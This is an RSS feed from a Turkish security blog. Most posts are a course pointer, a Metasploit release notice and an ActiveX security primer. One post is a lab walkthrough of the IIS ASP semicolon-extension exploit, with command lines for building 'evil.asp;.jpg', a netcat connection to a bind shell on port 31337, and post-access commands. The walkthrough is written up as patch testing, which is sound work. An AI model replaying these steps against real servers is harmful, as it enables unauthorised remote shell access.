<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sec &#34;IP&#34; nix &#187; Network Security</title>
	<atom:link href="http://www.ugurengin.com/blog/category/network-tutorial/feed" rel="self" type="application/rss+xml" />
	<link>http://www.ugurengin.com/blog</link>
	<description>Uğur Engin</description>
	<lastBuildDate>Fri, 03 Feb 2012 23:00:47 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>Online Penetration Testing Eğitimleri</title>
		<link>http://www.ugurengin.com/blog/online-penetration-testing-egitimleri.html</link>
		<comments>http://www.ugurengin.com/blog/online-penetration-testing-egitimleri.html#comments</comments>
		<pubDate>Thu, 27 May 2010 14:17:57 +0000</pubDate>
		<dc:creator>Uğur Engin</dc:creator>
				<category><![CDATA[Network Security]]></category>
		<category><![CDATA[Elearnsecurity]]></category>
		<category><![CDATA[security course]]></category>

		<guid isPermaLink="false">http://ugurengin.com/blog/?p=712</guid>
		<description><![CDATA[Elearnsecurity firmasinin hazırladığı Security Training ile ilgili  Darknet  de henuz yeni girilmis bir entry dikkatimi çekti. ilgilenen arkadaşlar inceleyebilirler. http://www.darknet.org.uk/2010/05/elearnsecurity-online-penetration-testing-training Detaylar: http://www.elearnsecurity.com/course/penetration_testing/ Share on Facebook]]></description>
			<content:encoded><![CDATA[<p>Elearnsecurity firmasinin hazırladığı Security Training ile ilgili  Darknet  de henuz yeni girilmis bir entry dikkatimi çekti.<br />
ilgilenen arkadaşlar inceleyebilirler.</p>
<p><a href="http://www.darknet.org.uk/2010/05/elearnsecurity-online-penetration-testing-training" target="_blank">http://www.darknet.org.uk/2010/05/elearnsecurity-online-penetration-testing-training</a></p>
<p>Detaylar:</p>
<p><a href="http://www.elearnsecurity.com/course/penetration_testing/" target="_blank">http://www.elearnsecurity.com/course/penetration_testing/</a></p>
<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.ugurengin.com%2Fblog%2Fonline-penetration-testing-egitimleri.html&amp;t=Online%20Penetration%20Testing%20E%C4%9Fitimleri" id="facebook_share_both_712" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; padding:2px 0 0 20px; height:16px; background:url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top left;">Share on Facebook</a>
	<script type="text/javascript">
	<!--
	var button = document.getElementById('facebook_share_link_712') || document.getElementById('facebook_share_icon_712') || document.getElementById('facebook_share_both_712') || document.getElementById('facebook_share_button_712');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_712') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	-->
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://www.ugurengin.com/blog/online-penetration-testing-egitimleri.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IIS ASP Multiple Extensions Remote Exploit</title>
		<link>http://www.ugurengin.com/blog/iis-asp-multiple-extensions-remote-0day-exploit.html</link>
		<comments>http://www.ugurengin.com/blog/iis-asp-multiple-extensions-remote-0day-exploit.html#comments</comments>
		<pubDate>Sun, 10 Jan 2010 14:32:38 +0000</pubDate>
		<dc:creator>Uğur Engin</dc:creator>
				<category><![CDATA[Network Security]]></category>
		<category><![CDATA[Others]]></category>
		<category><![CDATA[IIS 0DAY]]></category>
		<category><![CDATA[IIS6 Vulnerable]]></category>
		<category><![CDATA[Oday]]></category>

		<guid isPermaLink="false">http://ugurengin.com/blog/?p=427</guid>
		<description><![CDATA[Windows IIS sunucular üzerinde ciddi bir güvenlik açığı yayınlandı.İlgili exploit araciligiyla olusturulabilecek bir malicious  dosyası(06;.jpg) , IIS sunucu(5,6) üzerinde çalıştırıldığında sunucunun Outgoing den, atacker&#8217;in source&#8217;sine doğru 31337. portun açılmasınına sebep oluyor.Daha sonra  doğru payload&#8217;ı kullanabilecek kişi,  sunucu üzerinden shell alabiliyor. Patch cozumu gelistirmek icin ilgili exploiti virtual bir Windows Server da test ettim. Shellcode / [...]]]></description>
			<content:encoded><![CDATA[<p>Windows IIS sunucular üzerinde ciddi bir güvenlik açığı yayınlandı.İlgili exploit araciligiyla olusturulabilecek bir malicious  dosyası(06;.jpg) , IIS sunucu(5,6) üzerinde çalıştırıldığında sunucunun Outgoing den, atacker&#8217;in source&#8217;sine doğru 31337. portun açılmasınına sebep oluyor.Daha sonra  doğru payload&#8217;ı kullanabilecek kişi,  sunucu üzerinden shell alabiliyor.</p>
<p>Patch cozumu gelistirmek icin ilgili exploiti<strong> </strong><strong>virtual bir Windows Server da test ettim.</strong></p>
<p><span style="color: #008000;">Shellcode / Payload Connection</span></p>
<p><span style="color: #ff0000;"><strong>0 &#8211; shell_bind_tcp</strong></span></p>
<h3>Penetration materyaller:</h3>
<p>OS : Server 2003 Enterprise x86 SP2<br />
Victim Vlan: 192.168.127.130<br />
Web Server : IIS6<br />
Destination: Ubuntu 9.10 (karmic)</p>
<p>Testleri yapalım:</p>
<p><span style="color: #ff0000;">root@ubuntu:~/labs# python iis.py def.jpg 0<br />
Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x<br />
By Emanuele Gentili and Emanuele Acri (http://backtrack.it)<br />
[+] File<strong> evil.asp;.jp</strong>g created and ready to use.<br />
Enjoy&#8230; ;)</span></p>
<p><span style="color: #ff0000;">root@ubuntu:~/labs# ls -l<br />
total 1260<br />
-rw-r&#8211;r&#8211; 1 root root  12902 2009-10-31 01:08 def.jpg<br />
<strong>-rw-r&#8211;r&#8211; 1 root root 326377 2010-01-10 14:08 evil.asp;.jpg</strong><br />
-rwxrwxrwx 1 root root 945931 2010-01-10 14:03 iis.py</span></p>
<p style="text-align: left;">evil.asp;.jpg vulnerable durumda olan dosyayı IIS sunucuda çalıştıralım.</p>
<p><a href="http://ugurengin.com/blog/img/iiszort2.JPG" rel="lightbox[427]"><img class="aligncenter" src="http://ugurengin.com/blog/img/iiszort2.JPG" alt="" width="622" height="291" /></a></p>
<p><span style="color: #008000;">root@ubuntu:~/labs# <strong>nc -vv 192.168.127.130 31337</strong><br />
192.168.127.130: inverse host lookup failed: Unknown hosit<br />
(UNKNOWN) [192.168.127.130] 31337 (?) <strong>open</strong><br />
<span style="color: #008000;">Microsoft Windows [Version 5.2.3790]<br />
(C) Copyright 1985-2003 Microsoft Corp.</span></span></p>
<p><span style="color: #ff0000;"><span style="color: #008000;">c:\windows\system32\inetsrv&gt;ipconfig</span><br />
</span></p>
<p><span style="color: #008000;">Windows IP ConfigurationEthernet adapter Local Area Connection:<br />
Connection-specific DNS Suffix  . : localdomain<br />
IP Address. . . . . . . . . . . . : 192.168.127.130<br />
Subnet Mask . . . . . . . . . . . : 255.255.255.0<br />
Default Gateway . . . . . . . . . : 192.168.127.2</span></p>
<p><span style="color: #008000;">c:\windows\system32\inetsrv&gt;net user<br />
User accounts for \\LOCALROOT</span></p>
<p style="text-align: center;"><a href="http://ugurengin.com/blog/img/iiszort3.PNG" rel="lightbox[427]"><img class="aligncenter" src="http://ugurengin.com/blog/img/iiszort3.PNG" alt="" width="623" height="262" /></a></p>
<p>Network tarafinda olayları gozlemlemek icin, enfekte durumun da olup hacklenen serveri kontrol edelim.(Handshake checking)</p>
<p style="text-align: left;"><a href="http://ugurengin.com/blog/img/iiszoort.JPG" rel="lightbox[427]"><img class="aligncenter" src="http://ugurengin.com/blog/img/iiszoort.JPG" alt="" width="594" height="69" /></a></p>
<h3 style="text-align: left;"><span style="color: #ff0000;"><strong>Nmap</strong> ile kontrol edelim.<br />
</span></h3>
<p style="text-align: left;"><span style="color: #ff0000;">root@ubuntu:~/labs# nmap -sT -d 192.168.127.130 -p 31337</span></p>
<p style="text-align: left;"><span style="color: #ff0000;"><strong><span style="color: #008000;">31337/tcp open  Elite        syn-ack</span></strong><br />
MAC Address: 00:0C:29:71:6D:2B (VMware</span></p>
<p>Referanslar:</p>
<p><a href="http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf" target="_blank">http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf</a></p>
<p><a href="http://secunia.com/advisories/37831/" target="_blank">http://secunia.com/advisories/37831/</a></p>
<p style="text-align: left;">&nbsp;</p>
<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.ugurengin.com%2Fblog%2Fiis-asp-multiple-extensions-remote-0day-exploit.html&amp;t=IIS%20ASP%20Multiple%20Extensions%20Remote%20Exploit" id="facebook_share_both_427" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; padding:2px 0 0 20px; height:16px; background:url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top left;">Share on Facebook</a>
	<script type="text/javascript">
	<!--
	var button = document.getElementById('facebook_share_link_427') || document.getElementById('facebook_share_icon_427') || document.getElementById('facebook_share_both_427') || document.getElementById('facebook_share_button_427');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_427') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	-->
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://www.ugurengin.com/blog/iis-asp-multiple-extensions-remote-0day-exploit.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Metasploit 3.3.2</title>
		<link>http://www.ugurengin.com/blog/metasploit-3-3-2.html</link>
		<comments>http://www.ugurengin.com/blog/metasploit-3-3-2.html#comments</comments>
		<pubDate>Sun, 13 Dec 2009 21:43:39 +0000</pubDate>
		<dc:creator>Uğur Engin</dc:creator>
				<category><![CDATA[Network Security]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[Penetration Tests]]></category>
		<category><![CDATA[Under net/ground]]></category>

		<guid isPermaLink="false">http://ugurengin.com/blog/?p=395</guid>
		<description><![CDATA[Metasploit 3.3.2 ile bizlerle. Share on Facebook]]></description>
			<content:encoded><![CDATA[<p><strong><span style="color: #008080;">Metasploit 3.3.2 ile bizlerle.</span></strong></p>
<p><a title="Metasploit Release 3.3.2 Download." href="http://www.metasploit.com/framework/download/" target="_blank"><img class="aligncenter" src="http://ugurengin.com/blog/img/sploit.jpg" alt="" width="300" height="215" /></a></p>
<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.ugurengin.com%2Fblog%2Fmetasploit-3-3-2.html&amp;t=Metasploit%203.3.2" id="facebook_share_both_395" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; padding:2px 0 0 20px; height:16px; background:url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top left;">Share on Facebook</a>
	<script type="text/javascript">
	<!--
	var button = document.getElementById('facebook_share_link_395') || document.getElementById('facebook_share_icon_395') || document.getElementById('facebook_share_both_395') || document.getElementById('facebook_share_button_395');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_395') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	-->
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://www.ugurengin.com/blog/metasploit-3-3-2.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ActiveX Nedir ?  ActiveX Güvenliği</title>
		<link>http://www.ugurengin.com/blog/activex-nedir-activex-guvenligi.html</link>
		<comments>http://www.ugurengin.com/blog/activex-nedir-activex-guvenligi.html#comments</comments>
		<pubDate>Fri, 10 Jul 2009 21:07:07 +0000</pubDate>
		<dc:creator>Uğur Engin</dc:creator>
				<category><![CDATA[Network Security]]></category>
		<category><![CDATA[ActiveX]]></category>
		<category><![CDATA[Component Object Model]]></category>

		<guid isPermaLink="false">http://ugurengin.com/blog/?p=133</guid>
		<description><![CDATA[Yazan : Serhat Dündar ActiveX, Microsoft’un Windows platformları için geliştirdiği bir nesne bileşeni modelidir (COM). Yazılım tabanlı olan ActiveX teknolojisi Internet Explorer eklentisi ve web sayfalarına iliştirilmiş ActiveX tabanlı uygulama olarak çalışır. ActiveX teknolojisi geliştirilmeden önce Microsoft Windows’ta OLE (Object Linking and Embedding) ve COM (Component Object Model) olmak üzere iki standart mevcuttu. 1996 yılında [...]]]></description>
			<content:encoded><![CDATA[<p><span style="color: #ff6600;">Yazan : Serhat Dündar</span></p>
<p style="font-family: Verdana;"><span style="font-size: x-small;">ActiveX, Microsoft’un Windows platformları için geliştirdiği bir nesne bileşeni modelidir (COM). Yazılım tabanlı olan ActiveX teknolojisi Internet Explorer eklentisi ve web sayfalarına iliştirilmiş ActiveX tabanlı uygulama olarak çalışır.</span></p>
<p><img class="aligncenter" title="ActiveX Component" src="http://www.ugurengin.com/blog/img/activex.gif" alt="" width="335" height="118" /></p>
<p>ActiveX teknolojisi geliştirilmeden önce Microsoft Windows’ta OLE (Object Linking and Embedding) ve COM (Component Object Model) olmak üzere iki standart mevcuttu. 1996 yılında sunulan ActiveX ile bu iki standart birleştirildi. (Wikipedia)</p>
<p style="font-family: Verdana;"><span style="font-size: x-small;">Bu tanım işin programlama kısmıyla alakalı. Biz ise bu yazımızda active-x’in ne olduğundan çok ActiveX ile neler yapılabileceğine bakacağız.</span></p>
<p><span style="font-size: x-small;">ActiveX denetimi bir kod parçasıdır, programdır. O halde ActiveX denetimleri ile bilgisayarınıza yapılabilecekleri biraz da olsa tahmin etmişsinizdir</span></p>
<p style="font-family: Verdana;"><span style="font-size: x-small;"><strong><a title="Activex" href="http://docs.google.com/Doc?id=dhmdchf5_49dp34g6fq" target="_blank">Yazının devamını okuyunuz.</a></strong><br />
</span></p>
<p>Activex nesnesi&#8217;nin islevini ve güvenlik boyutunu aciklayıcı bir sekilde anlatan arkadasa tesekkur ederiz.</p>
<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.ugurengin.com%2Fblog%2Factivex-nedir-activex-guvenligi.html&amp;t=ActiveX%20Nedir%20%3F%20%20ActiveX%20G%C3%BCvenli%C4%9Fi" id="facebook_share_both_133" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; padding:2px 0 0 20px; height:16px; background:url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top left;">Share on Facebook</a>
	<script type="text/javascript">
	<!--
	var button = document.getElementById('facebook_share_link_133') || document.getElementById('facebook_share_icon_133') || document.getElementById('facebook_share_both_133') || document.getElementById('facebook_share_button_133');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_133') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	-->
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://www.ugurengin.com/blog/activex-nedir-activex-guvenligi.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

